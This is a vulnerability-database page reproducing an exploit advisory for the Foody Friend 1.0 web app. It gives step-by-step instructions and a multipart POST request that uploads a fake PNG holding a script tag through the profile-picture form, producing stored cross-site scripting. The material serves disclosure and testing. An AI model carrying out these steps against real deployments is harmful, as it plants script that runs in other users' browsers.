Lucene search
K

Foody Friend 1.0 Arbitrary File Upload / Cross Site Scripting

🗓️ 21 Jul 2023 00:00:00Reported by CraCkErType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 319 Views

Foody Friend 1.0 Arbitrary File Upload & Cross Site Scriptin

Code
`# Exploit Title: Foody Friend 1.0 - Arbitrary File Upload  
# Exploit Author: CraCkEr  
# Date: 12/07/2023  
# Vendor: Bug Finder  
# Vendor Homepage: https://bugfinder.net/  
# Software Link: https://bugfinder.net/product/foody-friend-a-saas-based-web-app-food-ordering-bot-for-telegram-and-messenger/25  
# Tested on: Windows 10 Pro  
# Impact: Allows User to upload files to the web server  
  
  
  
## Description  
  
Allows Attacker to upload malicious files onto the server, such as Stored XSS  
  
  
  
## Steps to Reproduce:  
  
1. Login as [Normal User]  
2. In [User Dashboard] go to [Edit profile]  
3. Choose profile picture & Upload any Image & Click on [Save Changes]  
4. Catch the POST Request with [Burp Proxy Intercept]  
5. Inject your [Stored XSS]  
  
POST /user/profile HTTP/2  
  
-----------------------------------------------------------  
Content-Disposition: form-data; name="profile_picture"; filename="XSS.png"  
Content-Type: image/png  
  
<script>alert(1)</script>  
-----------------------------------------------------------  
  
6. Send the Request  
7. Right Click on Your Profile Picture [Copy the Path of the Image]  
8. Access your Uploded Evil file on this Path: https://website/assets/upload/userProfile/[Stored-XSS]  
  
  
  
[-] Done  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation